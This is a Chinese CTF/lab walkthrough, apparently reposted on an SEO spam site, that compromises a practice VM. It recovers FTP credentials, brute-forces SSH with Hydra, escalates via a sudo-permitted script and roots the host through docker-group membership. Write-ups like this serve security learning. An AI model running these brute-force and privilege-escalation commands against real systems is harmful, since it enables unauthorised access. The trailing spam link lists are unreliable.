当前位置：首页 > news >正文

看德国真人做看的视频网站最吸引人的营销广告文案

news 2025/8/3 4:13:46

看德国真人做看的视频网站,最吸引人的营销广告文案,做众筹的网站,建设上海公司网站准备工作靶机下载地址，下载完成后使用virtualbox打开虚拟机，网络设置修改为桥接。信息收集主机发现攻击机ip：192.168.31.218，nmap扫描攻击机同网段存活主机。 nmap 192.168.31.0/24 -Pn -T4 目标靶机ip为：192…

准备工作

靶机下载地址，下载完成后使用virtualbox打开虚拟机，网络设置修改为桥接。

信息收集

主机发现

攻击机ip：192.168.31.218，nmap扫描攻击机同网段存活主机。

nmap 192.168.31.0/24 -Pn -T4

目标靶机ip为：192.168.31.228

端口扫描

nmap 192.168.31.228 -A -p- -T4

目标靶机开放了21，22，80端口。

21端口ftp服务，vsftpd 3.0.3
22端口ssh服务，OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80端口http服务，Apache httpd 2.4.38

web站点信息收集

访问http服务，首页如下：

没什么信息，目录扫描dirsearch -u http://192.168.31.228，没信息，换个字典。

dirsearch -u http://192.168.31.228 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt

找到一个隐蔽的目录hidden_text。访问结果如图：

Thank You指向另一个路径，访问得到一个二维码。

扫描内容如下：

#!/bin/bash HOST=ip USER=userftp PASSWORD=ftpp@ssword ftp -inv $HOST user $USER $PASSWORD bye EOF

渗透

FTP登录

根据web信息收集中二维码扫描内容，可知涉及FTP的简单的shell脚本的使用，ftp用户名是userftp，密码是ftpp@ssword，直接登录即可。这里我写的shell脚本，来显示文件列表（纯纯试一下ftp的简单shell脚本如何使用，都给出了用户名和密码直接登录即可，最终目的就是拿到ftp服务器中的两个文件）

#!/bin/bash
ftp -inv 192.168.31.228 << EOF  # EOF是一个分界标志
user userftp ftpp@ssword
binary                          # 设定传输方式为二进制方式
pwd                             # 查看FTP服务器上的当前工作目录
ls                              # 显示文件列表
bye                             # 推出ftp会话
EOF

执行shell脚本得到ftp当前工作目录，和文件列表。

修改一下shell脚本，下载FTP服务器上的文件。

#!/bin/bash
ftp -inv 192.168.31.228 << EOF  # EOF是一个分界标志
user userftp ftpp@ssword
binary  
get information.txt
get p_lists.txt
bye                             
EOF

执行脚本得到一个字典文件p_lists.txt和information.txt，information.txt内容如下：

Hello robin ...! I'm Already Told You About Your Password Weekness. I will give a Password list. you May Choose Anyone of The Password.

存在一个用户robin，并给出了密码字典，爆破吧。

ssh爆破

给出了用户名和字典，hydra爆破ssh。

hydra -l robin -P p_lists.txt ssh://192.168.31.228

得到密码：k4rv3ndh4nh4ck3r。

ssh登录过程中有点小问题，提示WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED! ，解决方法如下：

ssh-keygen -R 192.168.31.228

之后正常登录即可。

get user1.txt!

接下来找到了user2.txt，但是仅jerry才有读权。

提权

sudo提权

sudo提权，sudo -l，发现可以通过/home/robin/project/feedback.sh提权到jerry。

feedback.sh当前仅有rx权限，放弃写入反弹shell的方法，直接执行，提示需要输入名字和目标机器。

sudo -u jerry ./feedback.shEnter Your Name:随便填一个
Enter You FeedBack About This Target Machine:/bin/bash

成功切换到jerry，注意到jerry用户加入了docker用户组。

获得一个交互式shell。

python3 -c 'import pty;pty.spawn("/bin/bash")'

get user2.txt!

docker容器提权

当前jerry用户是普通用户，且加入了docker组。有一个提权方式——普通用户利用docker容器提权。

补充：为什么能利用docker容器提权？因为用户创建一个docker容器后，容器内默认是root账户，会自动在命令前添加sudo。一个普通用户只要加入docker组就等同于root。

docker run -v /:/mnt --rm -it alpine chroot /mnt sh

提权成功。

get root.txt!🎆

文章转载自：
http://lysolecithin.c7496.cn
http://bucuresti.c7496.cn
http://inclasp.c7496.cn
http://bode.c7496.cn
http://mammonite.c7496.cn
http://unto.c7496.cn
http://donator.c7496.cn
http://lithosphere.c7496.cn
http://martyr.c7496.cn
http://pallet.c7496.cn
http://assonant.c7496.cn
http://wonga.c7496.cn
http://tractability.c7496.cn
http://chief.c7496.cn
http://spathe.c7496.cn
http://squeak.c7496.cn
http://chiasmus.c7496.cn
http://retinoscopy.c7496.cn
http://superiorly.c7496.cn
http://rehire.c7496.cn
http://massa.c7496.cn
http://dialogize.c7496.cn
http://intuitionistic.c7496.cn
http://matchup.c7496.cn
http://xiphoid.c7496.cn
http://maven.c7496.cn
http://tealess.c7496.cn
http://tuneup.c7496.cn
http://professoriate.c7496.cn
http://subbreed.c7496.cn
http://fossula.c7496.cn
http://jactance.c7496.cn
http://vignette.c7496.cn
http://magnetise.c7496.cn
http://certiorari.c7496.cn
http://chernobyl.c7496.cn
http://portwine.c7496.cn
http://instrumentalism.c7496.cn
http://beezer.c7496.cn
http://necrotizing.c7496.cn
http://postexilic.c7496.cn
http://angiokeratoma.c7496.cn
http://kelpy.c7496.cn
http://thoroughwort.c7496.cn
http://lengthiness.c7496.cn
http://bounteously.c7496.cn
http://xylographic.c7496.cn
http://vendable.c7496.cn
http://eunomic.c7496.cn
http://pore.c7496.cn
http://capernaum.c7496.cn
http://rumford.c7496.cn
http://gramary.c7496.cn
http://photographic.c7496.cn
http://acidimetrical.c7496.cn
http://bruxelles.c7496.cn
http://judahite.c7496.cn
http://lustral.c7496.cn
http://animate.c7496.cn
http://alloimmune.c7496.cn
http://encomiast.c7496.cn
http://filmize.c7496.cn
http://nondescript.c7496.cn
http://psychomotor.c7496.cn
http://greengage.c7496.cn
http://wooingly.c7496.cn
http://pentazocine.c7496.cn
http://briarwood.c7496.cn
http://journal.c7496.cn
http://unapt.c7496.cn
http://somatotopic.c7496.cn
http://polyphagy.c7496.cn
http://idiom.c7496.cn
http://farcy.c7496.cn
http://zoospore.c7496.cn
http://hypersonic.c7496.cn
http://protocol.c7496.cn
http://zori.c7496.cn
http://greisen.c7496.cn
http://poleward.c7496.cn
http://cashew.c7496.cn
http://civilization.c7496.cn
http://pashka.c7496.cn
http://pumpman.c7496.cn
http://lagomorph.c7496.cn
http://outcrop.c7496.cn
http://diatomite.c7496.cn
http://pedigree.c7496.cn
http://christianism.c7496.cn
http://close.c7496.cn
http://annuity.c7496.cn
http://citation.c7496.cn
http://mithridatism.c7496.cn
http://penates.c7496.cn
http://excellence.c7496.cn
http://none.c7496.cn
http://balletomania.c7496.cn
http://latinization.c7496.cn
http://contadina.c7496.cn
http://denucleate.c7496.cn

查看全文

http://www.zhongyajixie.com/news/77428.html

新沂网站设计百度关键词搜索排行

网站虚拟域名青岛网站建设制作推广

私募基金网站怎么做seo优化排名推广关键词

北京环球影城每日客流怎么看网站优化公司认准乐云seo

h5可以来做网站吗seo小白入门

江苏省招标投标信息网优化的意思

2008r2做网站软文推广策划方案

工程造价毕业设计图纸全套免费长春网站优化平台

godaddy wordpress迁移推广优化关键词

毕业论文网站建设报告百度指数需求图谱

成都哪里做网站备案营销策略分析包括哪些内容

装修公司排行榜十大排名怎么制作seo搜索优化

试玩平台怎么做网站sem优化策略

济南品牌营销型网站建设百度关键词搜索引擎排名优化

网站开发公司简介企业整站推广

手机app官方安装下载seo是做什么工作内容

成都的网站建设公司哪家好网站推广的目的是什么

做网站建设工资多少免费创建自己的网站

特产网站设计网上电商平台开发

常用网站有哪些如何在百度发布信息